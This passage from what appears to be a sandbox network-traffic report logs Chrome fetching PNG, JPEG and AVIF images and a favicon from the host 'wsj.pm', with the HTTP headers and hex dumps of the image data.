                                                                                                                2024-04-25 14:58:21 UTC8000INData Raw: 4c 80 81 e7 e7 60 0e 97 71 2d 1d 1c 86 55 b1 b2 4b 26 2f 19 72 bd 46 9e 1d 98 67 96 08 e6 9d ca b8 0f 20 d3 a0 09 e3 89 8d 47 26 1a d8 ae c5 4f 99 ed db 36 73 d8 cc 83 54 c9 54 84 c5 2a bd 77 78 24 8a 0a d1 b9 89 d7 87 13 c9 d9 47 c8 2a 74 7f cf 41 ab fd 25 71 95 fa 6f 8d ad 95 ac a9 67 15 61 f1 99 18 2d 42 a4 c4 50 7b 4b 07 21 63 1e 99 2a f2 30 66 e2 34 bf 8e b7 09 b1 f0 86 8a ed 78 fe df d4 89 95 c0 dc 6c 0b 2f b7 63 e4 90 49 01 49 00 72 27 e7 5d 72 b7 69 7d 50 c9 56 fa 9f 62 d7 74 d2 4a 34 b2 11 c5 4f 27 24 4b 26 a0 90 1f d1 99 c4 80 90 50 b7 0d b6 cf 12 7e 74 3a ea 3e de b3 1b 19 b1 96 62 84 bc 0c 65 8c 7f f5 00 60 43 2f 22 59 f8 9d 03 21 d7 26 1b fc f4 08 59 6e f3 8b b6 67 fb 7c b6 13 23 34 3c 98 2d aa 01 6c 57 d0 e2 3e 03 2b f1 d7 10 54 a9 00 7b 77
                                                                                                                Data Ascii: L`q-UK&/rFg G&O6sTT*wx$G*tA%qoga-BP{K!c*0f4xl/cIIr']ri}PVbtJ4O'$K&P~t:>be`C/"Y!&Yng|#4<-lW>+T{w
                                                                                                                2024-04-25 14:58:21 UTC3338INData Raw: 75 e2 92 5c 8e 92 64 8f 27 09 2d 62 bc 3a e4 39 49 fc 82 49 f9 d0 1e 49 e8 2a bb 82 3b 78 76 c9 44 c9 25 35 43 69 78 32 cb 5e 20 f1 a5 34 56 22 33 2c 2c 43 0d eb 40 6f e4 f9 51 d4 3e fa ee 3c bb 50 ca e6 45 90 d1 ff 00 56 b5 8d fe a3 08 12 1a b0 f1 1e 52 45 55 fd 49 41 64 e7 c4 32 a2 85 1a e7 e6 e2 45 4b 99 6b 90 62 26 a3 24 96 2d c9 18 87 1d 65 e8 ca 03 e4 20 40 3e de 4e 49 b2 13 61 4f 80 3c 9d eb af 8c 55 b9 b1 f7 55 ae a6 55 86 4d 9a c5 81 14 55 eb c9 24 ad 71 d2 22 cf 23 7a 52 87 25 79 90 14 0f 4d 0e b4 3a 0b 0f a0 dd fb 6b b7 33 43 b5 b3 10 84 ed 9b f6 0c 74 49 94 39 a5 2b 9f 11 93 bd fa 6c db 03 7e 41 23 fe ae ba 66 a8 4a f2 0a ae f0 9d 00 52 30 4e d4 79 0b e0 93 a1 a5 f9 fc 90 7a e5 ac d6 27 01 9e af 1c 18 7b d6 b1 b6 6d c6 ad 1d 5c aa 9a e9 3b b7
                                                                                                                Data Ascii: u\d'-b:9III*;xvD%5Cix2^ 4V"3,,C@oQ><PEVREUIAd2EKkb&$-e @>NIaO<UUUMU$q"#zR%yM:k3CtI9+l~A#fJR0Nyz'{m\;


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                43192.168.2.1749763103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC347OUTGET /img/im-948629.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:17 GMT
                                                                                                                ETag: "5584-61648ff4da940"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 21892
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                2024-04-25 14:58:21 UTC7941INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6e 00 00 00 3e 08 06 00 00 00 ca d5 2e 0c 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c 3c bb e7 93 55 67 96 ee c9 df 30 13 31 73 63 6e cc 4c 57 77 55 a9 54 42 90 fe 64 9e 3c de 7b ef bd 3f e9 bd f7 3e 21 33 21 2d de 64 92 90 78 ef 84 93 40 42 20 64 10 20 40 20 09 49 54 49 2a a9 bc eb ee ea db 37 ee fd 4d 9c a3 99 f9 f0 c6 36 ef d9 fb ec d8 cf bb d6 7a 9e b5 d6 5e d7 ec 73 f1 e3 70 d3 e0 72 52 e3 b4 93 b2 da a8 f3 78 e9 49 44 69 f0 b8 09 eb 8d 24 5d 1e a4 62 19 eb 8b 04 bc f2 7a 29 3f f9 45 01 3f 7f bd 84 9f ae 2f e6 97 05 02 7e fe cb 22 36 16 94 23 10 88 a9 14 c9 d9 50 58 c6 fa 82 32 7e be 41 c0 6b 45 02 4a cb c4 fc fc 75 01 ff bc be 84 57 0b ca f9 a7
                                                                                                                Data Ascii: PNGIHDRn>.pHYs.#.#x?v IDATx<Ug01scnLWwUTBd<{?>!3!-dx@B d @ ITI*7M6z^sprRxIDi$]bz)?E?/~"6#PX2~AkEJuW
                                                                                                                2024-04-25 14:58:21 UTC8000INData Raw: e7 e3 9d 29 17 5e 2a cb b0 88 2b c9 68 e5 f8 d5 22 2c 0a 21 1e 8d 1c ab 5c 88 43 29 c9 ef 9b e5 42 e4 82 22 04 a5 45 a4 42 0e 9a d2 3f 26 2e 4c b9 32 90 5c 83 54 24 43 22 92 b2 6e 69 a0 85 a1 fa 14 97 0f ee e6 a3 b7 de e0 fa e9 13 8c b4 d4 d3 91 8a e6 4b 1d 8d c9 30 43 0d 55 f4 a6 fd f4 57 47 c8 ba 4d 6c ea 6a 60 e7 44 37 8b 3d f5 2c 0f b5 b2 32 d2 c6 da 54 2f 83 75 61 a2 2e 35 6e 43 25 36 6d 25 4d 69 6f 3e f3 ef 32 c9 d1 29 85 28 a5 65 a8 64 25 88 85 05 e8 54 42 f4 9a 4a 54 1a 09 15 c2 12 44 e2 52 44 a2 32 36 6e 7c 0d 41 45 21 42 51 09 5e ab 0a af 45 8b 51 af ca 13 20 ad 5a c6 d3 a7 9f f1 e8 c9 73 3a ea 52 34 c6 bc c4 9c 46 a2 4e 35 9b 9b 23 34 45 1d ec de b9 83 97 bf fa 81 c3 87 0e 23 11 16 51 5e 51 84 de a8 24 1b f6 60 51 8a f0 d8 b4 24 fc 36 da 33 21
                                                                                                                Data Ascii: )^*+h",!\C)B"EB?&.L2\T$C"niK0CUWGMlj`D7=,2T/ua.5nC%6m%Mio>2)(ed%TBJTDRD26n|AE!BQ^EQ Zs:R4FN5#4E#Q^Q$`Q$63!
                                                                                                                2024-04-25 14:58:21 UTC5951INData Raw: 23 a0 d3 a2 af ab a7 a3 b6 06 63 63 7d fc e1 6f ef ed f2 ab 67 4f d9 5e db 20 14 1a 62 73 eb 80 ed 6b 0f 18 19 9c c0 a1 52 e1 37 76 d1 28 91 c6 97 c5 2d 8d 2a aa cb 6a c8 ca c8 23 e1 4c 12 27 4f 9e e7 cd b7 ce f1 da ab 67 28 ca af 40 d3 ac c3 d4 6e 65 71 62 99 d9 d1 79 2e 2d 6f 31 3b bd 80 52 da 4a a5 b0 96 d7 5e 3b 8e 20 af 84 f4 b4 1c de 3c 7a 9e 36 85 81 8b a9 39 58 4c 46 06 3d 5e 44 69 49 54 27 bc 45 47 c6 09 ba 85 a9 b4 17 a5 62 ac c9 25 d8 2a 62 c2 aa 62 ce a9 26 da 51 c7 88 41 c1 56 d0 c2 bb d3 4e f6 c3 6a 74 85 67 10 9e 7d 83 a4 d7 7e 46 79 da 69 ca 32 12 28 cf 4a a6 f0 e2 59 6c 2d 0d 0c 59 f5 8c d8 4c cc f9 1d 2c 06 5d 2c 04 ec 2c 07 3d 5c 19 19 64 6d 20 12 1f 81 31 53 67 fc 08 4b 5a 52 80 ba ae 06 83 ac 0e 79 69 11 ad 45 b9 a8 b2 93 d1 08 33 70
                                                                                                                Data Ascii: #cc}ogO^ bskR7v(-*j#L'Og(@neqby.-o1;RJ^; <z69XLF=^DiIT'EGb%*bb&QAVNjtg}~Fyi2(JYl-YL,],,=\dm 1SgKZRyiE3p


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                44192.168.2.1749765103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC340OUTGET /img/AM.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:03 GMT
                                                                                                                ETag: "c5a8-61648fe7809c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 50600
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                2024-04-25 14:58:21 UTC7941INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 dc 00 00 00 dc 08 06 00 00 00 1b 5a cf 81 00 00 09 99 69 43 43 50 69 63 63 00 00 58 85 ed 99 57 50 94 c9 1a 86 bf ff 9f 3c cc 10 66 86 9c 86 9c 24 4a 18 40 72 4e 92 a3 a8 c0 cc 90 41 18 72 30 21 8b 2b b0 82 88 48 52 04 11 05 5c 70 75 09 b2 8a 8a 28 06 44 41 01 f3 82 2c 02 ca ba b8 8a a8 a8 6c a1 17 7b aa ce a9 73 b5 75 6e ce 7c 17 dd 4f bd dd 55 5f 77 55 5f bc f5 36 80 34 39 9e 9d 90 82 ea 01 24 24 a6 f2 7c 9c 6c 99 41 c1 21 4c c2 3d 20 02 15 28 40 03 7c 38 3b 25 c9 c3 d7 d1 0f 00 60 75 2f fc 5b bd 1b 03 64 75 be ab fd 9f d7 ff 6b 51 38 09 89 1c 00 84 01 00 b1 1c 6e 0a 1b 00 d9 01 00 d1 9c 04 ce aa 3e bb ca 19 a9 49 a9 00 a8 17 00 30 78 41 c1 21 00 28 67 95 23 be 71 e6 2a 47 7d e3 e2 af 7b fc 7c ec
                                                                                                                Data Ascii: PNGIHDRZiCCPiccXWP<f$J@rNAr0!+HR\pu(DA,l{sun|OU_wU_649$$|lA!L= (@|8;%`u/[dukQ8n>I0xA!(g#q*G}{|
                                                                                                                2024-04-25 14:58:21 UTC8000INData Raw: 86 07 4e fa fd ac 65 cd 8c 3e eb 59 cf da 9d e4 dd 2c 9b 29 1f 89 0d 5e ad f5 83 fe 27 67 d7 f0 6e 16 87 f3 c4 fa 00 19 5d 37 44 c0 63 a1 a0 0a 7d 91 6b 58 41 44 76 11 1b 63 0c bc 6c 2c 4b 76 1d e0 1b 6b 33 cc 24 d9 e7 77 cc 44 5f 5a 26 e6 3b 5d 52 5a f8 ca c0 e9 28 67 43 07 65 e5 01 0f 8f 29 2f d1 98 e2 b9 63 38 9e 46 06 50 16 91 47 69 4d 91 17 6f a6 11 12 24 e8 a3 df 4c 06 e5 7e 19 9d ef 52 fc 06 a5 d1 50 54 a6 86 78 e1 c5 65 96 78 cf 8c 44 21 3c 9e 55 90 8a 2e cc 6c 97 ff 78 b5 63 6b b4 f0 6b 41 6d 1d 7c 25 28 e5 b1 38 a8 8c 5e c7 40 fb 99 48 80 ea 12 18 d1 e5 79 6e e7 ed ad 32 b8 d4 0c fd 93 ea aa e8 2f 68 7d 2c 53 3b db 84 b5 50 94 32 87 d3 43 4a c1 37 c3 a7 df b4 65 0e 0d 4c 1a df 31 0f 7c e0 03 37 6f b0 d7 1e 9f 4d 7e 88 02 ae 83 e2 e8 62 33 94 66
                                                                                                                Data Ascii: Ne>Y,)^'gn]7Dc}kXADvcl,Kvk3$wD_Z&;]RZ(gCe)/c8FPGiMo$L~RPTxexD!<U.lxckkAm|%(8^@Hyn2/h},S;P2CJ7eL1|7oM~b3f
                                                                                                                2024-04-25 14:58:21 UTC8000INData Raw: 2f 09 9d a7 15 73 39 0f 18 4c 03 03 20 3a 9c 02 08 b6 d5 07 82 f2 8a fe 67 1c 7e e7 6d b5 85 d1 b8 0f 30 51 07 46 17 ca 79 19 f8 c4 02 d0 46 88 4a 66 d3 b3 fa 2e 26 6c 6f 97 a6 c7 89 e7 14 5e d4 90 07 63 21 db 39 af f2 58 bc 36 bf cf a9 55 0a 8a 47 e1 5c 53 69 c6 0d 8f 59 32 05 c2 33 10 f1 31 84 06 80 00 65 3e 10 93 1c f5 03 70 98 f2 5b 8d 8d 17 e2 a1 f2 54 da 7b 97 bb dc 65 93 29 1d e0 31 18 11 45 d5 d7 3c 2e 4a ad bf 01 38 6f 02 bc 1c 47 d6 e5 06 c8 4b 18 41 c9 e9 8e 38 ad ad 0f 80 26 d0 50 37 b1 a8 74 3f af d6 7a 3a de 8f 4e 35 0b 08 3d 07 42 8d 5f 32 a0 e4 93 31 71 2e ae a9 1e 1c 84 7a 96 13 a0 13 ea cc 2b d2 71 fd c9 5b 7a 57 97 bd f9 a6 e7 32 b8 78 3c ba c1 e0 da 7f 42 43 4b 8c b4 4f 9f 8e 43 19 29 32 74 a3 c8 bc 0a 2f d7 16 0d dc 33 c5 a5 dc 0c d1
                                                                                                                Data Ascii: /s9L :g~m0QFyFJf.&lo^c!9X6UG\SiY231e>p[T{e)1E<.J8oGKA8&P7t?z:N5=B_21q.z+q[zW2x<BCKOC)2t/3
                                                                                                                2024-04-25 14:58:21 UTC8000INData Raw: 9a 6d 54 ec 37 9d 49 bb 4e cf 7a 1e 2b 57 c4 c3 25 28 82 15 ab ad cf 1d 80 f0 92 29 90 12 4a 36 6f b1 5d 7d fd 06 bd 65 fb 34 04 1a 9a 0d 32 37 79 a5 9c f3 01 89 06 5c 19 07 41 96 6d 3c 09 f1 8e d5 7d 7d 67 c0 4d 2b 53 ba 67 41 ff 1a e0 fb 8e 12 ce cd 69 cc 88 91 68 41 49 a4 97 05 d3 32 5e bc 32 de df b1 bc bb 41 e4 68 4d de dc 75 79 0e d3 a8 a2 ba dd 6f 3e 4f 60 ca 26 70 82 c0 eb 80 3c 99 02 0e 19 cf f6 eb 8c 76 b6 57 a6 98 14 d3 10 0a b8 07 39 d4 56 46 dc a6 47 8a 34 3b 63 02 3a 62 3b 86 87 3a cb 4a f2 7e 90 1e e8 02 18 05 78 b6 0f e6 a5 ca ea fd c8 9c 1c e7 b8 9a 22 e4 98 fb 74 1e 33 46 85 7c 19 0c 60 68 6b 7a fd 93 c7 6f 3e 2a e6 24 ad df 16 f2 e8 b4 a1 1d ba 6a 3c 6e 4e ca 88 5e 1a ae 31 ad b1 f1 d4 93 e8 e4 15 f5 70 79 09 b1 02 23 9a 71 d7 4c cb 13
                                                                                                                Data Ascii: mT7INz+W%()J6o]}e427y\Am<}}gM+SgAihAI2^2AhMuyo>O`&p<vW9VFG4;c:b;:J~x"t3F|`hkzo>*$j<nN^1py#qL
                                                                                                                2024-04-25 14:58:21 UTC8000INData Raw: 27 bb ae 09 99 1b a3 dc 24 0c 4e a9 e1 09 13 bd 99 4b fa e7 71 8a 8e 41 99 56 45 ea b9 66 a5 a9 7d 5f b7 77 5b 51 ad cf ae 35 11 57 a0 df f6 78 c6 73 f2 0c 3c 8b 8e 93 40 40 af 18 97 73 d7 87 4b 52 c4 3c 6b ef 28 16 6f 8c 46 49 56 c8 72 f2 3a 68 14 85 60 6c 66 7b 98 ad c2 13 f8 8d 41 98 d9 31 a7 7d 01 17 c6 c8 68 19 83 31 3a e0 83 3a ce 75 5e 0a 5a 49 96 19 ae f1 36 e3 6f 4d ce e5 d9 4c 3b a3 e0 3d 68 52 91 28 69 95 b9 3a a3 ba c5 d0 a8 21 b9 f2 62 ea 9c 47 e1 4d da 47 b3 fb 79 77 cd 27 8f d5 1c ed cc 6d 10 5f 76 13 f0 94 15 15 bb 93 b1 73 1a d6 11 f7 f1 c4 7b d4 72 82 b0 75 82 65 5b 01 5c 61 06 3a eb 7e 8d 9f de d8 86 76 93 33 38 85 00 52 4c d3 81 28 13 cf 04 21 75 64 8f 99 62 30 73 61 26 4f 57 36 0a d5 91 29 64 24 56 17 a0 6a cd 58 67 88 33 d5 3d 3d ab
                                                                                                                Data Ascii: '$NKqAVEf}_w[Q5Wxs<@@sKR<k(oFIVr:h`lf{A1}h1::u^ZI6oML;=hR(i:!bGMGyw'm_vs{rue[\a:~v38RL(!udb0sa&OW6)d$VjXg3==
                                                                                                                2024-04-25 14:58:21 UTC8000INData Raw: a8 c5 13 55 d5 8e a8 38 37 95 39 bf d7 0e c6 c1 41 82 b3 fb 7b 5c 91 01 ae 41 f9 40 1f f7 50 04 8d 70 21 2c aa 21 76 07 68 02 5c 2c c4 3b e9 23 a6 92 12 69 11 20 62 3c 1e 81 b7 e0 31 5d 0f dc 14 63 b9 0f 4f 89 ba d7 b0 81 8c 00 af 41 f0 e4 d0 a2 f2 41 ca b6 15 a4 34 48 18 5e 46 59 d6 9e 0f e7 33 2a 3f 76 47 ae d8 53 68 22 96 90 12 62 70 77 3b c0 c6 d0 f5 54 93 e8 87 e7 01 7d c1 56 46 e6 f7 7f ff f7 5f 8e c3 96 90 69 e0 6c 1b e2 ba 7e d7 f3 37 98 1b 5b bb 05 ce 0c 14 e3 43 e1 36 ae 7e ae ca f6 50 0a 77 b5 45 02 cf 80 00 a8 9d 96 8d e2 f0 84 14 46 8c 82 c5 6a 1b bc 93 5a d7 08 94 e5 2f ab 50 84 9c b0 74 50 21 32 81 42 f0 68 04 c9 a4 f3 8e e7 7e 1f 67 23 38 ae 5d b5 8b 6a 18 56 9f 10 7a 4f 2e cf 35 79 8e f5 74 6d 01 c7 f2 13 36 4a e4 77 82 ed 25 ad 00 8a 51
                                                                                                                Data Ascii: U879A{\A@Pp!,!vh\,;#i b<1]cOAA4H^FY3*?vGSh"bpw;T}VF_il~7[C6~PwEFjZ/PtP!2Bh~g#8]jVzO.5ytm6Jw%Q
                                                                                                                2024-04-25 14:58:21 UTC2659INData Raw: 0a 3e 80 48 31 77 94 84 f2 89 c1 6c b0 7a 26 56 0d 7e 02 d6 00 c1 f2 e1 f9 1a e1 96 a3 62 21 09 48 67 a6 bd e9 60 9e 06 a2 23 af 28 8e a4 f7 bd c5 99 3c 35 4b 9e 97 d9 0a 77 4a e9 3a fa c7 12 53 06 f1 66 82 20 97 c8 0b d6 57 f7 c9 9a 7b 8e d6 7d 11 1e 16 5f f3 8c aa 34 aa 17 74 4f c4 41 0b 59 19 2f de 8b d2 14 e3 20 0f 24 9f 79 ea e2 43 fd ec 1a 0c 8c f9 90 07 ac b4 4a ac 95 e1 53 8c cc 10 e6 c5 36 9f 47 89 7d ce 77 41 e6 92 da fa 4b 01 cc bd be c4 92 7a 3e bf 43 2c 90 44 2b df 7f 76 40 75 fd 84 32 ca af 9e 0a 47 76 3a 2e cc 3d b0 b5 52 36 94 95 01 80 96 78 56 35 ae b1 96 bc f6 1a ec ab e5 5b 0f a1 70 4f 11 22 2c a3 bd 46 3c 34 b6 89 a7 c2 50 e5 21 34 50 c5 40 60 a5 52 bc 4e e2 3c 0b 88 09 a1 49 10 f7 9d 50 cc 04 b4 b0 f1 17 19 bc b3 ff 60 9c 98 32 4f c4
                                                                                                                Data Ascii: >H1wlz&V~b!Hg`#(<5KwJ:Sf W{}_4tOAY/ $yCJS6G}wAKz>C,D+v@u2Gv:.=R6xV5[pO",F<4P!4P@`RN<IP`2O


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                45192.168.2.1749766103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC348OUTGET /img/im-949113.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:29 GMT
                                                                                                                ETag: "c91-616490004c440"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 3217
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:21 UTC3217INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 3e 00 6e 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 02 01 00 ff c4 00 3f 10 00 02 01 02 04 04 04 04 03 05 04 0b 00 00 00 00 01 02 03 04 11 00 05 12 21 06 31 41 51 07 13 22 61 14 71 81 91 32 a1 b1 23 24 42 52 62 08 33 72 f0 15 34 35 43 53 a2 c1 d1 d2 e1 f1 ff
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((>n"?!1AQ"aq2#$BRb3r45CS


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                46192.168.2.1749767103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC348OUTGET /img/im-949723.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:39 GMT
                                                                                                                ETag: "4da-61649009d5ac0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1242
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:21 UTC1242INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 3e 00 6e 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 00 02 03 05 06 01 07 08 ff c4 00 37 10 00 02 01 03 02 02 07 04 08 07 00 00 00 00 00 00 01 02 03 00 04 11 05 21 12 31 06 13 32 41 51 61 81 14 71 91 a1 07 22 23 42 52 82 92 d1 62 72 83 b1 c1 e1 f0 ff c4 00 18 01 00 03 01 01
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((>n"7!12AQaq"#BRbr


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                47192.168.2.1749771103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC350OUTGET /img/im-44291453.avif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:51 GMT
                                                                                                                ETag: "4ba-61649015475c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1210
                                                                                                                Connection: close
                                                                                                                Content-Type: image/avif
                                                                                                                2024-04-25 14:58:21 UTC1210INData Raw: 00 00 00 20 66 74 79 70 61 76 69 66 00 00 00 00 61 76 69 66 6d 69 66 31 6d 69 61 66 4d 41 31 41 00 00 00 f2 6d 65 74 61 00 00 00 00 00 00 00 28 68 64 6c 72 00 00 00 00 00 00 00 00 70 69 63 74 00 00 00 00 00 00 00 00 00 00 00 00 6c 69 62 61 76 69 66 00 00 00 00 0e 70 69 74 6d 00 00 00 00 00 01 00 00 00 1e 69 6c 6f 63 00 00 00 00 44 00 00 01 00 01 00 00 00 01 00 00 01 1a 00 00 03 a0 00 00 00 28 69 69 6e 66 00 00 00 00 00 01 00 00 00 1a 69 6e 66 65 02 00 00 00 00 01 00 00 61 76 30 31 43 6f 6c 6f 72 00 00 00 00 6a 69 70 72 70 00 00 00 4b 69 70 63 6f 00 00 00 14 69 73 70 65 00 00 00 00 00 00 00 3c 00 00 00 3c 00 00 00 10 70 69 78 69 00 00 00 00 03 08 08 08 00 00 00 0c 61 76 31 43 81 20 00 00 00 00 00 13 63 6f 6c 72 6e 63 6c 78 00 02 00 02 00 01 80 00 00 00 17
                                                                                                                Data Ascii: ftypavifavifmif1miafMA1Ameta(hdlrpictlibavifpitmilocD(iinfinfeav01ColorjiprpKipcoispe<<pixiav1C colrnclx


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                48192.168.2.1749774103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC568OUTGET /favicon.ico HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC266INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
